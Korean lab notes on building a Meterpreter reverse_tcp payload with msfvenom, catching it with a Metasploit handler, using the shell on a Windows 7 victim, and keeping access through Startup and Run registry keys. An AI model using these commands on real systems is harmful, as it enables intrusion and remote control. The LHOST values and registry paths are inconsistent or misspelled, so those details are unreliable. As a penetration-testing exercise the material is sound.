meterpreter를 이용한 Reverse_TCP 공격 (msfvenom)

*meterpreter를 이용한 Reverse_TCP 공격
 bind_TCP : 타겟이 공인IP로 되어있는 경우에(서버) Attacker가 해당 타겟에 붙는 것
 reverse_TCP : 타겟이 사설IP로 되어있는 경우에(PC) Attacker가 항상 구동중인 상태의 서버로 타겟이 Attacker에 붙는 것

 Attacker : Kali
 Victim     : Windows 7
 ※메터프리터는 상대 OS별로 사용할 수 있는 명령어를 제공 한다.
 
*msfvenom
 msfvenom은 Metasploit의 페이로드를 파일 형식으로 만들어줌

*실습
 (kali)
 #mkdir -p /root/bin
 #cd /root/bin
 #vi reverse_resource.rc (msfconsole의 리소스 형식으로 할 예정)
 use exploit/multi/handler
 set PAYLOAD windows/x64/meterpreter/reverse_tcp
 set LHOST 192.168.20.50
 set ExitSession false
 exploit -j -z 

 #msfvenom -l (종류를 보여줌)
 #msfvenom --help-formats (포맷종류 보여줌)
 #msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.92.50 -f exe -o reverse_test.exe

 ※reverse_test.exe (window7에서 실행할 파일)
 ※여러가지 방법으로 window 7에 reverse_test.exe파일을 침투시키고 실행을 시킨다.

 #msfconsole -r reverse_resource.rc
 msf > sessions -l

 msf > sessions -i 1 (1번 세션을 사용한다는 것)

 meterpreter > help
 meterpreter > sysinfo

 meterpreter > getuid
 meterpreter > reboot (window7이 재부팅됨)
 meterpreter > shell (cmd창으로 연결이됨)

 *Windows에서 프로그램을 자동으로 실행시키는 방법
 1. 특정사용자 로그인시에 실행하게 할시에 위치 
 C:\Users\soldesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

 2. 윈도우 재부팅 시에 실행되게 할라면 다음 중 하나의 레지스터에 등록되어야 된다.
 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Winodws\Current Version\Run
 HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current Version\Run
 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\RunOnce
 HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current Version\RunOnce